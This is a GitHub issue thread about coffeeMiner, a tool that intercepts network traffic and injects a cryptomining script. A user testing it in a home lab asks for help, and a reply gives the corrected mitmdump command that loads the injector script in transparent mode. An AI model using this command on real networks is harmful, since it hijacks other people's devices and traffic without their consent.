arnaucube/coffeeMiner

No such script found

deangelo200 opened this issue · 1 comments

Hello I am trying to get the coffee miner to work on my computer. I am using virtual box running kali linux as the attacker on my mac and using my mac as the victim. For the victim.text i placed my mac computer ip address. I think the problem is im mixing up my attacker ip address and gateway ip address. I am getting this error /usr/bin/mitdmdump: No such script: "injector.py http://10.0.2.20:800/scripts.js" can someone please help me

had the same problem. its just the apostropy causing this.
set your line 28 like this and it will work.
("~/.local/bin/mitmdump -s injector.py 'localhost:8000/script.js' --mode transparent")
notice how double and single quotes are set.